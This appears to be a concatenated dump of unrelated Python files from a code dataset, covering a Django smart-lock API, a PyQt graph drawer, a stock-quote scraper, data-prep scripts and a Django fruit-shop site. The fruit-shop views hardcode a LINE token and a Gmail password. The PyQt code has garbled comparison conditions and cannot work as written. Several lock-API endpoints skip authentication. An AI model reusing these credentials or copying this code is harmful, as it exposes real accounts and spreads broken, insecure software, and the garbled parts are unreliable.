)\npv.generate()\n\n\npv.registerPlotGenerator( RandomPlotGenerator() )\npv.generate()\n\npv.registerPlotGenerator( InteractivePlotGenerator() ) \npv.generate()","sub_path":"Assignment_8.2.py","file_name":"Assignment_8.2.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"405788255","text":"import json\nimport jieba\nfiles = [\"companynews.txt\", \"cpinews.txt\", \"estatenews.txt\", \"gdpnews.txt\", \"industrynews.txt\", \"marketnews.txt\",\n \"ppinews.txt\", \"rmbnews.txt\"]\ndef collectFiles():\n with open(\"allnews.txt\", mode=\"w\", encoding=\"utf-8\") as allf:\n for file in files:\n with open(file, encoding=\"utf-8\") as f:\n for line in f:\n news = json.loads(line)\n content = \" \".join(jieba.cut(news[\"content\"]))\n allf.write(content + \" __label__\" + news[\"type\"] + \"\\n\")\ncollectFiles()\n","sub_path":"createTrainData.py","file_name":"createTrainData.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"616560944","text":"import boto3\nimport botocore\nimport threading\nfrom django.http import HttpResponse\nfrom django.core import serializers\nfrom django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist, PermissionDenied\nfrom django.shortcuts import render\nfrom django.contrib.auth.models import User\n\nfrom api.models import Video, Device, RemoteHistory, Lock, Record, Door, AddDevice\nfrom api.serializers import VideoSerializer, DeviceSerializer, RemoteHistorySerializer, RecordSerializer, LockSerializer, AddDeviceSerializer\n\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.authentication import TokenAuthentication\n\nfrom boto3.session import Session\nfrom src.settings import AWS_REGION\nfrom src.settings import S3_ACCESS_URL\nfrom src.settings import S3_ACCESS_KEY_ID, S3_SECRET_ACCESS_KEY, S3_STORAGE_BUCKET_NAME\n\nimport time\nfrom datetime import datetime, timedelta\nimport json\nimport uuid\n# Create your views here.\n\n#로그인 및 토큰 반환\nclass Login(APIView) : \n\n def get(self, request, format = None) : # request query에 door_id 포함되어있음 : api/auth?door_id=12345\n try :\n request_id = request.GET.get('door_id', None)\n if request_id == None :\n raise FieldDoesNotExist\n queryset = Door.objects.filter(door_id = request_id) # door_id 유효성 검색\n if queryset.exists() :# 유효할 때\n userid = uuid.uuid4()\n pw = uuid.uuid4()\n user = User.objects.create_user(username=str(userid), password=str(pw))\n token = Token.objects.create(user=user)\n res = {\n 'is_available' : True,\n 'access_token' : token.key \n }\n else :\n res = {\n 'is_available' : False\n }\n\n return Response(res, status = status.HTTP_200_OK)\n\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n\n\n\n def post(self, request, format = None) : \n Door.objects.create(door_id = 12345)\n Lock.objects.create(id=1)\n Record.objects.create(id=1)\n AddDevice.objects.create(id=1)\n return Response({\n 'msg' : 'doorid값 삽입 완료',\n })\n\n\n\n#기기 관련 api\nclass Devices(APIView) :\n # 기기 목록 조회\n def get(self, request, format = None) :\n try :\n queryset = Device.objects.all()\n serializer = DeviceSerializer(queryset, many = True)\n res = 
{\n 'deviceList': serializer.data\n }\n return Response(res, status = status.HTTP_200_OK)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n # 기기 추가 요청\n def put(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied\n print(request.body)\n target = AddDevice.objects.get(id=1)\n serializer = AddDeviceSerializer(target, many=False)\n state = serializer.data['state']\n if state == False:\n print(\">> 기기추가 요청이 들어옴\")\n target.state = True\n target.save()\n return Response({\n 'msg' : 'changed state successfully'\n }, status = status.HTTP_200_OK)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n # 기기 추가\n def post(self, request, format = None) : # request body에 rfid_id 포함되어있음 \n try : \n print(request.data)\n request_id = request.data.get('rfid_id', None)\n if request_id == None :\n raise FieldDoesNotExist\n queryset = Device.objects.create(rfid_id = request_id)\n queryset.save()\n \n select = Device.objects.filter(rfid_id = request_id).values()\n device_id = select[0]['device_id']\n rfid_id = select[0]['rfid_id']\n created = select[0]['created']\n return Response({\n \"device_id\" : device_id,\n \"rfid_id\" : rfid_id,\n \"created\" : created\n }, status = status.HTTP_200_OK)\n\n except FieldDoesNotExist as error : \n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n\n\n\n # 기기 삭제\n def delete(self, request, device_id, format = None): # request URI에 device_id(자동생성되는 기기 고유 번호 != rfid_id) 포함\n try :\n if request.auth == None :\n raise PermissionDenied \n request_id = device_id\n if request_id == None:\n raise FieldDoesNotExist \n queryset = Device.objects.get(device_id=request_id)\n queryset.delete()\n return Response({\n 'msg' : 'success delete device'\n })\n \n except FieldDoesNotExist as error : \n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 원격 잠금 해제 \nclass Remote(APIView):\n # 원격 잠금 해제 기록 조회\n def get(self, request, format = None) : \n #models.py의 class History 사용.\n try:\n if request.auth == None :\n raise PermissionDenied \n queryset = RemoteHistory.objects.all()\n serializer = RemoteHistorySerializer(queryset, many = True)\n res = {\n \"remoteHistoryList\": serializer.data\n }\n return Response(res, status = status.HTTP_200_OK)\n except PermissionDenied as error : \n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n\n # 원격 잠금 해제\n def post(self, request, format = None) :\n try:\n if request.auth == None :\n raise PermissionDenied \n print(request.body)\n data = json.loads(request.body)\n device_name = data.get('device_name', None)\n if device_name == None :\n raise FieldDoesNotExist\n else:\n target = Lock.objects.get(id=1)\n serializer = LockSerializer(target, many=False)\n state = serializer.data['state']\n if state == True:\n print(\">> 원격 잠금해제 요청이 들어옴\")\n # 기록에 저장\n now = datetime.now()\n queryset = RemoteHistory.objects.create(device_name=device_name, created=now)\n queryset.save()\n # 잠금 해제 상태로 변경\n target.state = False\n 
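`Remote.post` here records the unlock in `RemoteHistory` and flips `Lock.state` to `False`; the physical lock presumably polls that row and mirrors it onto the bolt. A hypothetical device-side loop with that shape — none of these callables exist in this codebase:

```python
import time

def follow_lock_state(get_locked, engage, release, interval=1.0):
    """Mirror a server-side boolean (True = locked) onto the physical bolt."""
    was_locked = True
    while True:
        locked = get_locked()
        if locked != was_locked:
            engage() if locked else release()  # actuate only on transitions
            was_locked = locked
        time.sleep(interval)
```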
target.save()\n return Response({\n 'msg' : 'success remote unlock'\n }, status = status.HTTP_200_OK)\n\n except FieldDoesNotExist as error:\n return Response({\n 'error': \"FieldDoesNotExist \",\n 'date': datetime.now()\n }, status=status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n\n\n# 비디오 목록 조회\nclass VideoList(APIView) : \n def get(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied \n queryset = Video.objects.all()\n serializer = VideoSerializer(queryset, many = True)\n res = { \n 'videoList': serializer.data\n } # 응답코드에 포함될 데이터\n return Response(res, status = status.HTTP_200_OK)\n except FieldDoesNotExist as error:\n return Response({\n 'error': \"FieldDoesNotExist \",\n 'date': datetime.now()\n }, status=status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 비디오 확인\nclass VideoDetail(APIView) :\n def get(self, request, vid_name, format = None) : # 요청한 URI에 vid_name가 포함되어있음\n try :\n if request.auth == None :\n raise PermissionDenied \n request_id = vid_name\n if request_id == 'None' :\n raise FieldDoesNotExist \n queryset = Video.objects.filter(vid_name = request_id) # door_id 유효성 검색\n if not queryset.exists():\n raise FieldDoesNotExist \n download_url = S3_ACCESS_URL + str(request_id) + '.mp4' # S3 다운로드 링크 변환\n if not download_url :\n raise ObjectDoesNotExist \n res = {\n 's3link' : download_url\n } # 응답 코드에 보낼 데이터\n return Response(res, status = status.HTTP_200_OK)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except ObjectDoesNotExist as error :\n return Response({\n 'error' : \"ObjectDoesNotExist\",\n 'date' : datetime.now()\n }, status = status.HTTP_404_NOT_FOUND)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 비디오 수동 삭제\n def delete(self, request, vid_name, format = None) : # request URI에 vid_name가 포함되어있음 : api/video/{vid_name}\n try : \n if request.auth == None :\n raise PermissionDenied \n request_id = vid_name\n if request_id == 'None' :\n raise FieldDoesNotExist\n session = boto3.session.Session(aws_access_key_id = S3_ACCESS_KEY_ID, aws_secret_access_key = S3_SECRET_ACCESS_KEY, region_name = AWS_REGION)\n s3 = session.client('s3')\n \n target = Video.objects.get(vid_name = request_id)\n s3.delete_object(Bucket = S3_STORAGE_BUCKET_NAME, Key = str(target.vid_name) + '.mp4')\n s3.delete_object(Bucket = S3_STORAGE_BUCKET_NAME, Key = str(target.vid_name) + '_thumb.jpg')\n target.delete()\n return Response(status = status.HTTP_200_OK)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n# 비디오 자동 삭제\nclass CheckDate(APIView) :\n def delete(self, request, format = None) :\n checkdate = datetime.now() + timedelta(days = -7)\n quaryset = Video.objects.filter(created__lt = checkdate)\n session = boto3.session.Session(aws_access_key_id = S3_ACCESS_KEY_ID, 
aws_secret_access_key = S3_SECRET_ACCESS_KEY, region_name = AWS_REGION)\n s3 = session.client('s3')\n for delvid in quaryset :\n s3.delete_object(Bucket = S3_STORAGE_BUCKET_NAME, Key = str(delvid.vid_name) + '.mp4')\n quaryset.delete()\n return Response(status = status.HTTP_200_OK)\n\n# 비디오 녹화 설정 조회/변경\nclass Recording(APIView) :\n def get(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied\n target = Record.objects.get(id = 1)\n serializer = RecordSerializer(target, many = False)\n res = {\n 'recording' : serializer.data['recording']\n }\n return Response(res, status = status.HTTP_200_OK)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied\",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST) \n\n def put(self, request, format = None) :\n try :\n if request.auth == None :\n raise PermissionDenied\n print(request.body)\n data = json.loads(request.body)\n if 'recording' not in data:\n raise FieldDoesNotExist\n target = Record.objects.filter(id = 1)\n target.update(recording = data['recording'])\n res = {\n 'recording' : data['recording']\n }\n return Response(res, status = status.HTTP_200_OK)\n except PermissionDenied as error :\n return Response({\n 'error' : \"PermissionDenied \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n except FieldDoesNotExist as error :\n return Response({\n 'error' : \"FieldDoesNotExist \",\n 'date' : datetime.now()\n }, status = status.HTTP_400_BAD_REQUEST)\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"63106660","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom Transacao import Transacao\n\nclass Vertice(object):\n \n def __init__(self,raio,texto,x,y):\n self.raio = raio\n self.texto = QString(texto)\n self.x = x\n self.y = y\n \n def drawVertice(self,painter):\n painter.drawEllipse(self.x,self.y,self.raio,self.raio)\n painter.drawText((self.x+self.raio/2)-5,(self.y+self.raio/2)+5,self.texto)\n \nclass Aresta(object):\n def __init__(self,verticeOrigem,verticeDestino):\n self.verticeOrigem = verticeOrigem\n self.verticeDestino = verticeDestino\n \n def drawAresta(self,painter):\n \n x1=self.verticeOrigem.x+self.verticeOrigem.raio/2\n y1=self.verticeOrigem.y+self.verticeOrigem.raio/2\n x2=self.verticeDestino.x+self.verticeDestino.raio/2\n y2=self.verticeDestino.y+self.verticeDestino.raio/2\n raio = self.verticeDestino.raio\n p1 = QPoint(0,0)\n p2 = QPoint(0,0)\n p3 = QPoint(0,0)\n \n \n if(x1x2 and y1y2):\n x1 = x1 + raio/3\n y1 = y1 - raio/3\n x2 = x2 - raio/3\n y2 = y2 + raio/3\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2-12)\n p1.setY(y2)\n p3.setX(x2)\n p3.setY(y2+12)\n elif(x1>x2 and y1>y2):\n x1 = x1 - raio/3\n y1 = y1 - raio/3\n x2 = x2 + raio/3\n y2 = y2 + raio/3\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2)\n p1.setY(y2+12)\n p3.setX(x2+12)\n p3.setY(y2)\n elif(x1==x2 and y1y2):\n y1 = y1 - raio/2.15\n y2 = y2 + raio/2.15\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2+9)\n p1.setY(y2+9)\n p3.setX(x2-9)\n p3.setY(y2+9)\n elif(x1>x2 and y1==y2):\n x1 = x1 - raio/2.15\n x2 = x2 + raio/2.15\n p2.setX(x2)\n p2.setY(y2)\n p1.setX(x2+9)\n p1.setY(y2+9)\n p3.setX(x2+9)\n p3.setY(y2-9)\n elif(x10:\n # select host\n host = self._hosts.get()\n try:\n # make request url\n url = self._makeurl(host.host, codes)\n if url:\n # request remote service\n stime = time.time()\n resp = requests.get(url, 
headers=Agent.HEADERS, timeout=self._timeout)\n etime = time.time()\n\n # parse response\n result = self._parse(resp.text)\n\n # add host succeed\n host.addsucceed(etime-stime)\n\n return result\n else:\n raise Exception('not host can be used')\n except Exception as e:\n retry -= 1\n error = host.host+\":\"+str(e)\n host.addfailed(error)\n errors.append(errors)\n\n raise Exception(str(errors))\n\n def hosts(self):\n \"\"\"\n get hosts for agent\n :return:\n \"\"\"\n return self._hosts\n\n def _makeurl(self, host, codes):\n \"\"\"\n make request url by stock codes\n :param codes:\n :return:\n \"\"\"\n # make url\n sina_quote_url = \"http://\"+host+\"/rn=\"+Agent._makern()+\"&list=\"\n\n return sina_quote_url+\",\".join(Agent._addse(codes))\n\n @staticmethod\n def _makern():\n return digit.strbasen(round(random.random()*60466176), 36)\n\n @staticmethod\n def _addse(codes):\n \"\"\"\n add securities exchange flag before stock codes, like: 000001->sz000001\n :param codes: array, stock codes\n :return:\n array, stock codes with exchange flag\n \"\"\"\n ncodes = []\n for code in codes:\n ncodes.append(stock.addse(code))\n return ncodes\n\n @staticmethod\n def _parse(text):\n \"\"\"\n parse response text\n :param text:\n :return:\n \"\"\"\n # parse results\n results = []\n\n # alias for item\n alias = {\n \"jkj\": 1, \"zsj\": 2, \"dqj\": 3, \"zgj\": 4, \"zdj\": 5,\n \"cjl\": 8, \"cje\": 9,\n \"mrl1\": 10, \"mrj1\": 11, \"mrl2\": 12, \"mrj2\": 13, \"mrl3\": 14, \"mrj3\": 15, \"mrl4\": 16, \"mrj4\": 17, \"mrl5\": 18, \"mrj5\": 19,\n \"mcl1\": 20, \"mcj1\": 21, \"mcl2\": 22, \"mcj2\": 23, \"mcl3\": 24, \"mcj3\": 25, \"mcl4\": 26, \"mcj4\": 27, \"mcl5\": 28, \"mcj5\": 29,\n \"date\": 30, \"time\": 31\n }\n\n # parse all response quotes\n quotes = text.strip().split('\\n')\n\n # parse each quote\n for quote in quotes:\n items = quote.split(',')\n\n # stock code\n code = items[0].split('=')[0][-6:]\n\n qte = {}\n # stock quote\n for k in alias:\n qte[k] = items[alias[k]]\n\n # process date&time\n qte['time'] = qte['date']+\" \"+qte['time']\n del qte['date']\n\n # add to results\n results.append({'code': code, 'quote': Agent._tidy(qte)})\n\n return results\n\n def _tidy(quote):\n \"\"\"\n tidy quote data\n :param quote:\n :return:\n \"\"\"\n # prices\n prices = [\"jkj\", \"zsj\", \"dqj\", \"zgj\", \"zdj\", \"cje\", \"mrj1\", \"mrj2\", \"mrj3\", \"mrj4\", \"mrj5\", \"mcj1\", \"mcj2\", \"mcj3\", \"mcj4\", \"mcj5\"]\n\n # volumes\n volumes = [\"cjl\", \"mrl1\", \"mrl2\", \"mrl3\", \"mrl4\", \"mrl5\", \"mcl1\", \"mcl2\", \"mcl3\", \"mcl4\", \"mcl5\"]\n\n # tidy prices\n for p in prices:\n if quote.get(p) is not None:\n quote[p] = str(decimal.Decimal(quote[p]).quantize(decimal.Decimal('0.00')))\n\n # tidy volumes\n for v in volumes:\n if quote.get(v) is not None:\n quote[v] = str(math.floor(int(quote[v])/100))\n\n return quote","sub_path":"app/lib/sec/sec/stock/quote/sina/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433366301","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 5 09:08:00 2018\r\n\r\n@author: Kim Earl Lowell\r\n\"\"\"\r\n\r\n#%%\r\n# This code will read in all the ufo files pulled down previously\r\n# and convert them to a csv file. 
The output csv file will have two\r\n# fields -- an index ('blog') and a text field ('text').\r\n# First read the name of all the files in the directory.\r\n###################### remove CR/LF #############################\r\n# This function removes the carriage return/line feed from a string.\r\ndef rmCRLF(string):\r\n string=string.replace('\\n',' ')\r\n string=string.replace('\\r',' ')\r\n string=string.replace(',',' ')\r\n return string\r\n################## MAIN BODY OF PROGRAM ########################s\r\nfrom os import listdir\r\nimport pandas as pd\r\npathtest='C:/Analytics/DATA900/Python_III/PythIII_Assignments/20news-bydate/20news-bydate-test/talk.ufo/'\r\npathtrain='C:/Analytics/DATA900/Python_III/PythIII_Assignments/20news-bydate/20news-bydate-train/talk.ufo/'\r\noutpath='C:/Analytics/DATA902/DATA902_TextMining_Phani/TextMine_Assignments/'\r\noutfile='ufo_blogs.csv'\r\ntrainfiles=listdir(pathtrain)\r\n#print(trainfiles)\r\n# Set up outputs.\r\nblog=1\r\ncols=['blog','text']\r\ndfout=pd.DataFrame(columns=cols)\r\nfor i,file in enumerate(trainfiles):\r\n blog=int(blog)\r\n textobj=open(pathtrain+trainfiles[i],'r')\r\n text=textobj.read()\r\n text=rmCRLF(text)\r\n# print(i,'\\n',text)\r\n# Create temp dataframe for appending.\r\n dfnew=pd.DataFrame([[int(blog),text]],columns=cols)\r\n dfout=dfout.append(dfnew)\r\n blog=blog+1\r\n# if i > 9:\r\n# break\r\n# Now add test files.\r\ntestfiles=listdir(pathtest)\r\nfor i,file in enumerate(testfiles):\r\n blog=int(blog)\r\n textobj=open(pathtest+testfiles[i],'r')\r\n text=textobj.read()\r\n text=rmCRLF(text)\r\n# print(i,'\\n',text)\r\n# Create temp dataframe for appending.\r\n dfnew=pd.DataFrame([[int(blog),text]],columns=cols)\r\n dfout=dfout.append(dfnew)\r\n blog=blog+1\r\ndfout['blog']=dfout['blog'].astype(int)\r\ndfout.to_csv(path_or_buf=outpath+outfile, index=False)\r\n","sub_path":"TextMine_UFOFormat_csv.py","file_name":"TextMine_UFOFormat_csv.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"332586912","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 15 00:58:16 2018\n\n@author: codyyork\n\"\"\"\n\n###Multple Linear Regression###\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndataset = pd.read_csv(\n \"/Users/codyyork/Documents/GitHub/Machine_Learning/Regression/Multiple Linear Regression/50_Startups.csv\")\nx = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder \nLabelEncoder_x = LabelEncoder()\nx[:, 3] = LabelEncoder_x.fit_transform(x[:, 3])\n \noneHotEncoder = OneHotEncoder(categorical_features = [3])\nx = oneHotEncoder.fit_transform(x).toarray()\n\n##Avoiding the Dummy Variable Trap##\nx = x[:, 1:]\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2)\n\n##Fitting Multiple Linear Regression to the Training set##\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train, y_train)\n\n##Predicting the Test set results##\ny_pred = regressor.predict(x_test)\n\n##Building the optimal model using Backward Elimination##\nimport statsmodels.formula.api as sm\n\n#only p-values\ndef backwardElimination(x, sl):\n numVars = len(x[0])\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n if maxVar > sl:\n for j in 
range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n x = np.delete(x, j, 1)\n regressor_OLS.summary()\n return x\n \nSL = 0.05\nx_opt = x[:, [0, 1, 2, 3, 4, 5]]\nx_modeled = backwardElimination(x_opt, SL)\n\n#p-values and r sqaured\n'''\ndef backwardElimination(x, SL):\n numVars = len(x[0])\n temp = np.zeros((50,6)).astype(int)\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n adjR_before = regressor_OLS.rsquared_adj.astype(float)\n if maxVar > SL:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n temp[:,j] = x[:, j]\n x = np.delete(x, j, 1)\n tmp_regressor = sm.OLS(y, x).fit()\n adjR_after = tmp_regressor.rsquared_adj.astype(float)\n if (adjR_before >= adjR_after):\n x_rollback = np.hstack((x, temp[:,[0,j]]))\n x_rollback = np.delete(x_rollback, j, 1)\n print (regressor_OLS.summary())\n return x_rollback\n else:\n continue\n regressor_OLS.summary()\n return x\n \nSL = 0.05\nx_opt = x[:, [0, 1, 2, 3, 4, 5]]\nx_modeled = backwardElimination(x_opt, SL)\n'''\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Regression/Multiple Linear Regression/Multiple_Linear_Regression.py","file_name":"Multiple_Linear_Regression.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"223932244","text":"from django.contrib import admin\nfrom django.core import paginator\nfrom django.core.paginator import Paginator\nfrom django.db import reset_queries\nfrom django.http import request\nfrom django.shortcuts import render, redirect #restricly access\nfrom django.http import HttpResponse #HttpResponse is a fucntion to show content on site\nfrom .models import *\nfrom datetime import datetime\n\n########Line Notify########\nfrom songline import Sendline\ntoken ='ZDXWM1wd3IhrbZjeq882GXgIBk8OnRk8qFDklLPXn7c'\nmessenger = Sendline(token)\n\n######Generate token#########\nimport random\nimport string\ndef GenerateToken(domain='http://localhost:8000/confirm/'):\n\tallchar = [ i for i in list(string.ascii_letters)] #Generate ascii to list\n\tallchar.extend([str(i) for i in range(10)])# extending number 0-9 in the list\n\temailtoken = ''\n\tfor i in range(40):\n\t\temailtoken += random.choice(allchar)\n\n\turl = domain + emailtoken\n\t#print(url)\n\treturn (url,emailtoken)\n\ndef Confirm(request,token):\n\ttry:\n\t\tcheck = VerifyEmail.objects.get(token=token)\n\t\tstatus = 'found'\n\t\tcheck.approved = True\n\t\tcheck.save()\n\t\tcontext = {'status':status,'username':check.user.username,'name':check.user.first_name}\n\texcept:\n\t\tstatus = 'notfound'\n\t\tcontext = {'status':status}\n\t\n\treturn render(request, 'myapp/confirm.html',context)\n\n#######EMAIL########\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\ndef sendthai(sendto,subj=\"ทดสอบส่งเมลลล์\",detail=\"สวัสดี!\\nคุณสบายดีไหม?\\n\"):\n\n\tmyemail = 'noreply.teamtesting@gmail.com'\n\tmypassword = \"gsHofh;p96\"\n\treceiver = sendto\n\n\tmsg = MIMEMultipart('alternative')\n\tmsg['Subject'] = subj\n\tmsg['From'] = 'Team Best Fruit'\n\tmsg['To'] = receiver\n\ttext = detail\n\n\tpart1 = MIMEText(text, 'plain')\n\tmsg.attach(part1)\n\n\ts = smtplib.SMTP('smtp.gmail.com:587')\n\ts.ehlo()\n\ts.starttls()\n\n\ts.login(myemail, mypassword)\n\ts.sendmail(myemail, receiver.split(','), msg.as_string())\n\ts.quit()\n\n\n###########Start sending#############\ndef 
EmailConfirm(email,name,token):\n\tsubject = 'ยืนยันการสมัครเว็บไซต์ Best Fruit'\n\tnewmember_name = name\n\tcontent = '''\n\tขอบคุณที่ท่านทำการสัมครสามาชิก Best Fruit! ปลอดภัยของการเข้าใช้\n\tกรุณายืนยันอีเมลล์ ผ่านลิ้งค์ด้านล่างนี้:\n\tขอให้สนุกกับการเลือกสินค้า และถ้าต้องการติดต่อ เสนอแนะเราท่านสามารถติต่อเราได้ทันที.\n\t'''\n\n\t#link = 'http://best-fruit.com/confirm/fawtkataktaktkawkejtjka'\n\tlink = token\n\n\tmsg = 'สวัสดีครับ คุณ{} \\n\\n {}\\n Verify Link: {}'.format(newmember_name,content,link)\n\tsendthai(email,subject,msg)\n###############\n\n\n# Create your views here.\ndef Home(request):\n\tproduct = Allproduct.objects.all().order_by('id').reverse()[:3] #query data form all products by descending order\n\tpreorder = Allproduct.objects.filter(quantity__lte=0 ) \n\t#quantity__lte=0 (find the quantity is less than or equal zero (<=0))\n\t#quantity__gt=0 (find the quantity is greater than zero (>))\n\tcontext = {'product':product,'preorder':preorder}\n\treturn render(request, 'myapp/home.html', context)\n\n\n\t#return HttpResponse('
สวัสดี Hello world
      ')\n\ndef About(request):\n\treturn render(request, 'myapp/about.html')\n\ndef Contact(request):\n\treturn render(request, 'myapp/contact.html')\n\ndef Apple(request):\n\treturn render(request, 'myapp/apple.html')\n\nfrom django.core.files.storage import FileSystemStorage\n\ndef Addproduct(request):\n\n\tif request.user.profile.usertype != 'admin':\n\t\treturn redirect('home-page')\n\n\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\tname = data.get('name')\n\t\tprice = data.get('price')\n\t\tdetail = data.get('detail')\n\t\timageurl = data.get('imageurl')\n\t\tquantity = data.get('quantity')\n\t\tunit = data.get('unit')\n\n\n\t\tnew = Allproduct()\n\t\tnew.name = name\n\t\tnew.price = price\n\t\tnew.detail = detail\n\t\tnew.imageurl = imageurl\n\t\tnew.quantity = quantity\n\t\tnew.unit = unit\n\t\t############Save Image################\n\t\ttry:\n\t\t\tfile_image = request.FILES['imageupload']\n\t\t\tfile_image_name = request.FILES['imageupload'].name.replace(' ','')\n\t\t\tprint('FILE_IMAGE:', file_image)\n\t\t\tprint('IMAGE_NAME:', file_image_name)\n\t\t\tfs = FileSystemStorage()\n\t\t\tfilename = fs.save(file_image_name,file_image)\n\t\t\tupload_file_url = fs.url(filename)\n\t\t\tnew.image = upload_file_url[6:]\n\t\texcept:\n\t\t\tnew.image = '/default-product.jpg'\n\t\t###############################\n\t\tnew.save()\n\n\treturn render(request, 'myapp/addproduct.html')\n\nfrom django.core.paginator import Paginator\n\ndef Products(request):\n\tproduct = Allproduct.objects.all().order_by('id').reverse() #query data from all products by descending order\n\tpaginator = Paginator(product,3) #1 หน้าโชว์ 3 ชิ้นเท่านั้น\n\tpage = request.GET.get('page') # http://localhost:8000/allproduct/?page=2\n\tproduct = paginator.get_page(page)\n\tcontext = {'product':product}\n\treturn render(request, 'myapp/allproduct.html', context)\n\ndef ProductsCategory(request,code):\n\tselect = Category.objects.get(id=code)\n\tproduct = Allproduct.objects.filter(catname=select).order_by('id').reverse() #query data from all products by descending order\n\tpaginator = Paginator(product,3) #1 หน้าโชว์ 3 ชิ้นเท่านั้น\n\tpage = request.GET.get('page') # http://localhost:8000/allproduct/?page=2\n\tproduct = paginator.get_page(page)\n\tcontext = {'product':product,'catname':select.catname}\n\treturn render(request, 'myapp/allproductcat.html', context)\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login\n\ndef Register(request):\n\tif request.method == 'POST':\n\t\tdata = request.POST.copy()\n\t\tfirst_name = data.get('first_name')\n\t\tlast_name = data.get('last_name')\n\t\temail = data.get('email')\n\t\tpassword = data.get('password')\n\t\t#ยังไม่ได้ใส่ try except เพื่อป้องกันการสมัครซ้ำ\n\t\t#+ alret ไปหน้าสมัครว่าอีเมลล์นี้เคยสมัครแล้ว\n\t\t#สอนคู่กับหัวข้อ reset password\n\n\t\tnewuser = User()\n\t\tnewuser.username = email\n\t\tnewuser.email = email\n\t\tnewuser.first_name = first_name\n\t\tnewuser.last_name = last_name\n\t\tnewuser.set_password(password)\n\t\tnewuser.save()\n\n\t\tprofile = Profile()\n\t\tprofile.user = User.objects.get(username=email)\n\t\tprofile.save()\n\n\t\t##### send email for verify #### **** <<>>\n\t\ttoken,token_code = GenerateToken()\n\t\tEmailConfirm(email,first_name,token)\n\t\tgetuser = User.objects.get(username=email)\n\t\taddverify = VerifyEmail()\n\t\taddverify.user = 